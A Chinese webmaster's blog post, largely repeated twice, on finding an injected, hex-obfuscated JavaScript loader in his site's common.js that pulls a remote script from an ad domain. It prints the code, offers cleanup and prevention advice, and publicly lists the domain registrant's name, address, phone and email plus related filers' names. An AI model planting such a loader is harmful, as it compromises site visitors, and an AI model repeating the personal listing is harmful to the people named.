2011/03/19 1654 Views
最近在实习之余开始学习javascript了,主要还是因为自己预备将自己的特长向WEB前端倾斜,包括HTML、CSS、javascript、DOM、SEO等,因而也就没有将太多时间放在博客上,可是前天却发现打开博客一会儿后,会跳转成一个广告页面,浏览器地址替换为:http://www.qq937.com/mhxx/tz/3370.html?cid=3370,网友五月天也在博客反映小红伞提示页面有不安全因素。很典型,本博也被别有用心的人给挂马了。
通过查看首页源文件,零才确信博客模板并没有被篡改过,于是猜测一定是首页引用的某个JS文件被挂马了。对首页所有引用的JS文件内容检查,最终在SCRIPT/common.js里发现了挂马代码,代码如下:
document.write("<\x73"+"cript src='http://\x61"+"d.\x6E"+
"u99"+".\x63"+"om/i"+"p.asp?l"+"oc=jingmen'><\/s"+"cript>");
"u99"+".\x63"+"om/i"+"p.asp?l"+"oc=jingmen'><\/s"+"cript>");
于是删掉该段代码就清除了这个挂马,如果对这段代码感兴趣的可以了解下javascript,其中使用了简单的加密手段,即将部分字母转成了ASCII码,比如\x73代表s,\x61代表a,\x6E代表n,更多的ASCII码大家可以参考ASCII码表。
关于网站被挂马的一点建议
现在网站被挂马的越来越多了,零才记得上一次牟长青博客也被挂马过,貌似和零才博客被挂马的方式一样,都是通过javascript挂马的。所以,如果站长发现自己的网站被挂马了,第一需要检查的应该就是该页面的源代码和引用javascript的内容。同时,大家可以使用网页挂马分析专家MDecoder检测网站挂马情况,零才今天就是通过该工具锁定common.js文件的。除此之外,站长朋友们还可以安装小红伞杀毒软件,一般的挂马内容都会被检测到的,这样可以尽可能早的知道网站被挂马了。
当然,避免网站被挂马才是最为关键的,你可以对才在隐患的javascript进行漏洞检测,排除可能的漏洞,但是如果不会查找漏洞和修改javascript的,就需要采用其他的方法了。零才推荐的方法就是将网站所有的javascript放在根目录一个单独的文件夹,比如script文件夹,然后在网站空间的控制面板对该文件夹取消写权限,这样所有javascript文件就不会被篡改了。
曝光
零才对挂马代码中的域名进行了简单的顺藤摸瓜了一番,找到了该域名以及域名所有人还用的其他域名,在此做个曝光。
引用
nu99.com的whois信息:
Name : Li DeSI
Organization : Guangzhou WeiZhi Soft
Address : Room 850,building No.1, JIayiYuan,No 445,North Road,Guangzhou
City : guangzhoushi
Province/State : guangdongsheng
Country : china
Postal Code : 510410
Phone Number : 86-020-7829898
Fax : 86-020-7829898
Email : hasom@foxmail.com
hasom@foxmail.com 下的其他域名:wa66.com oy66.com zom123.net mp3tj.com
ICP网站备案信息:
备案/许可证号: 粤ICP备09164785号 审核通过时间: 2009-09-07
主办单位名称: 钟艺
域名:wa66.com oy66.com zom123.net
备案/许可证号: 粤ICP备09132699号 审核通过时间: 2009-07-20
主办单位名称: 罗新华
域名:mp3tj.com
Name : Li DeSI
Organization : Guangzhou WeiZhi Soft
Address : Room 850,building No.1, JIayiYuan,No 445,North Road,Guangzhou
City : guangzhoushi
Province/State : guangdongsheng
Country : china
Postal Code : 510410
Phone Number : 86-020-7829898
Fax : 86-020-7829898
Email : hasom@foxmail.com
hasom@foxmail.com 下的其他域名:wa66.com oy66.com zom123.net mp3tj.com
ICP网站备案信息:
备案/许可证号: 粤ICP备09164785号 审核通过时间: 2009-09-07
主办单位名称: 钟艺
域名:wa66.com oy66.com zom123.net
备案/许可证号: 粤ICP备09132699号 审核通过时间: 2009-07-20
主办单位名称: 罗新华
域名:mp3tj.com
之所以在这里列出改域名所有人的一些信息,不仅是想谴责下那些别有用心的挂马人,更希望饱受过该人骚扰的同学继续努力,找出真凶,为营造和谐互联网而努力!
博客被挂马
最近在实习之余开始学习javascript了,主要还是因为自己预备将自己的特长向WEB前端倾斜,包括HTML、CSS、javascript、DOM、SEO等,因而也就没有将太多时间放在博客上,可是前天却发现打开博客一会儿后,会跳转成一个广告页面,浏览器地址替换为:http://www.qq937.com/mhxx/tz/3370.html?cid=3370,网友五月天也在博客反映小红伞提示页面有不安全因素。很典型,本博也被别有用心的人给挂马了。
通过查看首页源文件,零才确信博客模板并没有被篡改过,于是猜测一定是首页引用的某个JS文件被挂马了。对首页所有引用的JS文件内容检查,最终在SCRIPT/common.js里发现了挂马代码,代码如下:
document.write("<\x73"+"cript src='http://\x61"+"d.\x6E"+
"u99"+".\x63"+"om/i"+"p.asp?l"+"oc=jingmen'><\/s"+"cript>");
于是删掉该段代码就清除了这个挂马,如果对这段代码感兴趣的可以了解下javascript,其中使用了简单的加密手段,即将部分字母转成了ASCII码,比如\x73代表s,\x61代表a,\x6E代表n,更多的ASCII码大家可以参考ASCII码表。
关于网站被挂马的一点建议
现在网站被挂马的越来越多了,零才记得上一次牟长青博客也被挂马过,貌似和零才博客被挂马的方式一样,都是通过javascript挂马的。所以,如果站长发现自己的网站被挂马了,第一需要检查的应该就是该页面的源代码和引用javascript的内容。同时,大家可以使用网页挂马分析专家MDecoder检测网站挂马情况,零才今天就是通过该工具锁定common.js文件的。除此之外,站长朋友们还可以安装小红伞杀毒软件,一般的挂马内容都会被检测到的,这样可以尽可能早的知道网站被挂马了。
当然,避免网站被挂马才是最为关键的,你可以对才在隐患的javascript进行漏洞检测,排除可能的漏洞,但是如果不会查找漏洞和修改javascript的,就需要采用其他的方法了。零才推荐的方法就是将网站所有的javascript放在根目录一个单独的文件夹,比如script文件夹,然后在网站空间的控制面板对该文件夹取消写权限,这样所有javascript文件就不会被篡改了。
曝光
零才对挂马代码中的域名进行了简单的顺藤摸瓜了一番,找到了该域名以及域名所有人还用的其他域名,在此做个曝光。
nu99.com的whois信息:
Name : Li DeSI
Organization : Guangzhou WeiZhi Soft
Address : Room 850,building No.1, JIayiYuan,No 445,North Road,Guangzhou
City : guangzhoushi
Province/State : guangdongsheng
Country : china
Postal Code : 510410
Phone Number : 86-020-7829898
Fax : 86-020-7829898
Email : hasom@foxmail.com
hasom@foxmail.com 下的其他域名:wa66.com oy66.com zom123.net mp3tj.com
ICP网站备案信息:
备案/许可证号: 粤ICP备09164785号 审核通过时间: 2009-09-07
主办单位名称: 钟艺
域名:wa66.com oy66.com zom123.net
备案/许可证号: 粤ICP备09132699号 审核通过时间: 2009-07-20
主办单位名称: 罗新华
域名:mp3tj.com
之所以在这里列出改域名所有人的一些信息,不仅是想谴责下那些别有用心的挂马人,更希望饱受过该人骚扰的同学继续努力,找出真凶,为营造和谐互联网而努力!
本文来自: 零才网络推广博客(http://www.0cai.net/) 详细出处参考:http://www.0cai.net/post/javascript-guama.html
Leave a comment